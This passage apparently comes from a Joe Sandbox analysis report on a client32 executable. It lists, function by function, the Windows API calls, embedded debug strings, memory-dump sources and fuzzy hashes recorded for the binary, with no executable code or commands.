                                                                              • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                              • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                              • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                              • SetBkColor.GDI32(?,?), ref: 11113615
                                                                              • SetTextColor.GDI32(?,?), ref: 11113620
                                                                              • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                              • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                              • String ID:
                                                                              • API String ID: 1094208222-0
                                                                              • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                              • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 110F0067
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,110F0E7E,?,?,AB86ACF8), ref: 110F009F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110F00AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocGlobalRelease
                                                                              • String ID:
                                                                              • API String ID: 1459782005-0
                                                                              • Opcode ID: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                              • Instruction ID: 895e16ec520d13b6265c6dc70c6115b10cf0d765340dc232e34c0638dbe3d9ef
                                                                              • Opcode Fuzzy Hash: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                              • Instruction Fuzzy Hash: BF113172A41228A7D3209B949DC9FDBB7ECEB4C716F000179FD19C3604E6755C0043E1
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 1103E453
                                                                              • _memset.LIBCMT ref: 1103E461
                                                                              • _memmove.LIBCMT ref: 1103E46E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 1103E140: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111EE49C), ref: 1103E171
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
                                                                              • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
                                                                              • API String ID: 3725223747-3293259664
                                                                              • Opcode ID: 65fbcd292fc2e97c14b863c0970ab91c49f26a03f1556fc5066ab98669f3dd53
                                                                              • Instruction ID: 67eb2363300651043992ab9ba8f6f3d77738c65c139b63c55815287ab0b028a8
                                                                              • Opcode Fuzzy Hash: 65fbcd292fc2e97c14b863c0970ab91c49f26a03f1556fc5066ab98669f3dd53
                                                                              • Instruction Fuzzy Hash: DBB1C479E116269FDB06CF94CC95BEDF3F1BF89248F008165E81667384FA31A905CBA1
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 110433A9
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MetricsSystem$__wcstoi64_memset
                                                                              • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                              • API String ID: 3760389471-710950153
                                                                              • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                              • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,?,75BF7CB0,75BF7AA0), ref: 1106E322
                                                                              • SetEvent.KERNEL32(?,?,00000000,1106C3F0,?,?), ref: 1106E402
                                                                              Strings
                                                                              • erased=%d, idata->dead=%d, xrefs: 1106E4D3
                                                                              • ..\ctl32\Connect.cpp, xrefs: 1106E4EA
                                                                              • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106E305
                                                                              Similarity
                                                                              • API ID: CriticalEnterEventSection
                                                                              • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                              • API String ID: 2291802058-2272698802
                                                                              • Opcode ID: 1117f4c99858950bdf7fd7672d5969ca3ec3e6b5db68b6395f532a2427e1d8b3
                                                                              • Instruction ID: 66fcff3922a30ee90d8c0767053203911b60367f0834e94f449308d57fcee819
                                                                              • Opcode Fuzzy Hash: 1117f4c99858950bdf7fd7672d5969ca3ec3e6b5db68b6395f532a2427e1d8b3
                                                                              • Instruction Fuzzy Hash: 9371C074E043A59FE715CF64C488F9ABBE9BB04318F1485D9E41A9B291DB30ED85CF90
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11158356
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 1115836F
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 111583CF
                                                                              • _malloc.LIBCMT ref: 111583F7
                                                                              • _free.LIBCMT ref: 111584D3
                                                                              • _free.LIBCMT ref: 111584DF
                                                                                • Part of subcall function 110EE290: _memmove.LIBCMT ref: 110EE3AF
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                              • String ID: (
                                                                              • API String ID: 3140430649-3887548279
                                                                              • Opcode ID: 12fdfd4c8a273e77a88b58fe584f7b62bc5b6364b25748152a4ba4f7ded49458
                                                                              • Instruction ID: 15e3a403059262efe8d3bf227268a655022ed24b1a0bcf9f4d942b7dba633f9b
                                                                              • Opcode Fuzzy Hash: 12fdfd4c8a273e77a88b58fe584f7b62bc5b6364b25748152a4ba4f7ded49458
                                                                              • Instruction Fuzzy Hash: F05162B5A112149FDB54DF18CC80B9AB7B9EF89308F4545ADEA09DB341DB30BA44CF68
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _sprintf
                                                                              • String ID: Error. soundlevel < -32768 $Error. soundlevel > 32767$Warning. %s$f[%d]=%f, < -1.0$f[%d]=%f, > 1.0
                                                                              • API String ID: 1467051239-371636152
                                                                              • Opcode ID: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                              • Instruction ID: 522ba922067402ac051fad8bc1310d1daa1aefdf4381fc39071b0cd0fb0c6887
                                                                              • Opcode Fuzzy Hash: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                              • Instruction Fuzzy Hash: 19416936E04249CBC700DFA8C884ADDFBB4FF85244F6546BDD8981B346DB326995CBA0
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                              • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                              • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                              • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                              • API String ID: 1092798621-1973987134
                                                                              • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                              • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                              APIs
                                                                                • Part of subcall function 1112B9B0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                • Part of subcall function 1112B9B0: FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112C2CA
                                                                              • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112C2E2
                                                                              • _calloc.LIBCMT ref: 1112C2ED
                                                                              • _free.LIBCMT ref: 1112C38B
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1112C3A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                              • String ID: ntohl$ws2_32.dll
                                                                              • API String ID: 2881363997-4165132517
                                                                              • Opcode ID: b360deecd4c7b58a32711b4f6cbc729d67b5d7b917707d991309c8b9ca3b50e9
                                                                              • Instruction ID: 6f53df559584d72e955e8895b1c3eb0ef550ffad707d5752582ab7c49ea61f7f
                                                                              • Opcode Fuzzy Hash: b360deecd4c7b58a32711b4f6cbc729d67b5d7b917707d991309c8b9ca3b50e9
                                                                              • Instruction Fuzzy Hash: DD314C75E00229DBD7619FA48D80B99F7B8FF48714F6085A5D999A7200DF30AA858FD0
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CE0C5
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CE0F8
                                                                              • GetWindowRect.USER32(?,?), ref: 110CE103
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Rect$Window$ClientErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hWnd$m_hWnd
                                                                              • API String ID: 2908456680-3958695921
                                                                              • Opcode ID: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
                                                                              • Instruction ID: 712cfbea46f41dce34da92735377c28625c10b46f47693fc43de73f5d42021ce
                                                                              • Opcode Fuzzy Hash: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
                                                                              • Instruction Fuzzy Hash: 4A316275D00219AFDB14CFA8CC81EEEFBB4EF49318F1481A9E9566B244D730A944CFA5
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111062A1
                                                                              • EnterCriticalSection.KERNEL32 ref: 111062B8
                                                                              • GetTickCount.KERNEL32 ref: 111062BE
                                                                              • GetTickCount.KERNEL32 ref: 1110635B
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106368
                                                                              Strings
                                                                              • Warning. took %d ms to get simap lock, xrefs: 111062CF
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106379
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 956672424-625438208
                                                                              • Opcode ID: bcf611a48e79798e2679fdea00c267a7477b06a59c5547b500324db8bd2ad56d
                                                                              • Instruction ID: 9d4f7db00d5457b5153fc7aca0f3d87c755b2dbc5f7e99f6effce6267b28cb7e
                                                                              • Opcode Fuzzy Hash: bcf611a48e79798e2679fdea00c267a7477b06a59c5547b500324db8bd2ad56d
                                                                              • Instruction Fuzzy Hash: 8231D075E082559FE310DF64CA84F5AFBF4EB06328F2506A5E829AB790C730EC40CB90
                                                                              APIs
                                                                              • GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                              • GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                              • MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                              • GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemRect$DialogPoints
                                                                              • String ID:
                                                                              • API String ID: 3303679393-3916222277
                                                                              • Opcode ID: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                              • Instruction ID: 5736af7a59c5bbb3b2c62e90579a0a420b4469d74747aaa82dc812657f03fbc3
                                                                              • Opcode Fuzzy Hash: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                              • Instruction Fuzzy Hash: A7314F75E0020EAFCB18CFA9D985EAFBBB8EB88704F10855DE515E7244D774AE40CB64
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 1101E140
                                                                              • GetDlgItem.USER32(00000000,000013A2), ref: 1101E199
                                                                              • GetWindowRect.USER32(00000000), ref: 1101E1A0
                                                                              • GetDlgItem.USER32(00000000,0000139F), ref: 1101E1AF
                                                                              • GetWindowRect.USER32(00000000), ref: 1101E1B6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101E120
                                                                              • m_hWnd, xrefs: 1101E125
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: RectWindow$Item$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2038946005-2830328467
                                                                              • Opcode ID: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                              • Instruction ID: 1bb08d0e26d3f84db878e7f9f950f280f16ec03f41355f49a35b763b070fbd80
                                                                              • Opcode Fuzzy Hash: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                              • Instruction Fuzzy Hash: 89315C74D0031AEFCB14DFB5C984AEEFBB9FB48308F108569E51667604EB71A954CB90
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,1102EA98,?), ref: 1114837D
                                                                              • wsprintfA.USER32 ref: 1114839B
                                                                              • OutputDebugStringA.KERNEL32(?,?,1102EA98,?), ref: 111483B1
                                                                                • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                • Part of subcall function 11148010: GetCurrentThreadId.KERNEL32 ref: 11148023
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480A3
                                                                                • Part of subcall function 11148010: IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480E8
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 11148105
                                                                              • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F6
                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F9
                                                                                • Part of subcall function 110B7F30: GetLastError.KERNEL32(1111025B,11195AD8,?,?,11029B81,?,11195AD8,1111025B,00000000), ref: 110B7F5C
                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F6B
                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F8D
                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FBD
                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FE8
                                                                                • Part of subcall function 110B7F30: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B800C
                                                                                • Part of subcall function 110B7F30: TranslateMessage.USER32(?), ref: 110B8015
                                                                                • Part of subcall function 110B7F30: DispatchMessageA.USER32(?), ref: 110B801E
                                                                              • GetKeyState.USER32(00000011), ref: 11148419
                                                                              Strings
                                                                              • Exception caught at %x. Trying minidump., xrefs: 11148395
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                              • String ID: Exception caught at %x. Trying minidump.
                                                                              • API String ID: 490122820-543155386
                                                                              • Opcode ID: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                              • Instruction ID: 29a59b4c4c914cd8c532226d15f5e4317bff798f4e19c00b73adffff4a71f3ad
                                                                              • Opcode Fuzzy Hash: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                              • Instruction Fuzzy Hash: 3121F875D002189BD715DBA4DDC0FD9F3B8EB1C709F0040A8EA1597A84DBB06E84CFA5
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1108132F
                                                                              • _memset.LIBCMT ref: 11081318
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 75970324-4264523126
                                                                              • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                              • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111061AF
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000,1114E33E,AB86ACF8,?,?,1118D473,000000FF,?,1114E7EB,00000000,?,111CD988), ref: 111061B8
                                                                              • GetTickCount.KERNEL32 ref: 111061BE
                                                                              • GetTickCount.KERNEL32 ref: 11106245
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,1114E33E,AB86ACF8,?,?,1118D473,000000FF,?,1114E7EB,00000000,?,111CD988), ref: 1110624E
                                                                              Strings
                                                                              • Warning. took %d ms to get simap lock, xrefs: 111061CA
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106261
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 956672424-625438208
                                                                              • Opcode ID: f8ece47c6be674cfc6cbb52fd4534d0e4ed0937040c1bec23388106697da3059
                                                                              • Instruction ID: 7bf4b4de6c1225bf845d1b57b19833cf2f95df170fbc6f728bfd986e642e3a36
                                                                              • Opcode Fuzzy Hash: f8ece47c6be674cfc6cbb52fd4534d0e4ed0937040c1bec23388106697da3059
                                                                              • Instruction Fuzzy Hash: F821C278E052A59FE706DFA4DA94F15FBE1AB4631CF2548B9D4068B652C730DC84C741
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,?,00000000), ref: 110282C1
                                                                              • GetProcAddress.KERNEL32(00000000,GetProductInfo), ref: 11028308
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028334
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028350
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressErrorFreeLastLoadProc
                                                                              • String ID: 8$GetProductInfo$Kernel32.dll
                                                                              • API String ID: 2540614322-3445568372
                                                                              • Opcode ID: aa26be5f8cbbfd869b96a8c783efff813acd0f8cb5c7f6c090b51664995c8e87
                                                                              • Instruction ID: 8301ff5709e053f562061a61a0d53d896ae4a996452523829adbc8398c520df5
                                                                              • Opcode Fuzzy Hash: aa26be5f8cbbfd869b96a8c783efff813acd0f8cb5c7f6c090b51664995c8e87
                                                                              • Instruction Fuzzy Hash: 3D21CFB1D4129CAFDB10CFDAD9C4AEDFBF8FB09614F90816EE429A6644D7340A008B61
                                                                              APIs
                                                                              • FindWindowA.USER32(?,00000000), ref: 1108C2B4
                                                                              • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108C2D3
                                                                              • OpenProcess.KERNEL32(00000440,00000000,04000000,110ED099,?,04000000,00000000,?,00000000,00000000,?,00000000,110ECF7D,?,110ED099,0000070B), ref: 1108C2E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessWindow$FindOpenThread
                                                                              • String ID: Error. NULL hToken$Progman
                                                                              • API String ID: 3432422346-976623215
                                                                              • Opcode ID: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                              • Instruction ID: a798542badd3240e5ba587e482d1b03e6f16632b9767cf240999fd85d1b1ba7e
                                                                              • Opcode Fuzzy Hash: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                              • Instruction Fuzzy Hash: 8A11D676E4021C9BD714CFF4C985BEDF7F8DB4C219F0041A9E916A7644DB71A900CBA0
                                                                              APIs
                                                                                • Part of subcall function 11028290: LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,?,00000000), ref: 110282C1
                                                                                • Part of subcall function 11028290: GetProcAddress.KERNEL32(00000000,GetProductInfo), ref: 11028308
                                                                                • Part of subcall function 11028290: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028334
                                                                              • ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                              • RevertToSelf.ADVAPI32 ref: 110283DC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryUser$AddressCloseFreeHandleImpersonateLoadLoggedNameProcRevertSelf
                                                                              • String ID: @$IsMultiPointShell hUser=%p, user=%s, sesh=%d$SRCShell
                                                                              • API String ID: 2421214410-2753544478
                                                                              • Opcode ID: 4218291dc0949de53468530136ce9ee69e83e14b3ed088a51870e52bbe8e6e97
                                                                              • Instruction ID: a3b5864e1cd91ce2ca378080a24cbbe269bd62ca1436d7be2fb329270c9e10de
                                                                              • Opcode Fuzzy Hash: 4218291dc0949de53468530136ce9ee69e83e14b3ed088a51870e52bbe8e6e97
                                                                              • Instruction Fuzzy Hash: 8D110A3AD011299FDB00DFF4DD84AEEF7ECAF05309B45017AE91593240DB30A609C795
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                              • GetMenuItemCount.USER32(00000000), ref: 11003367
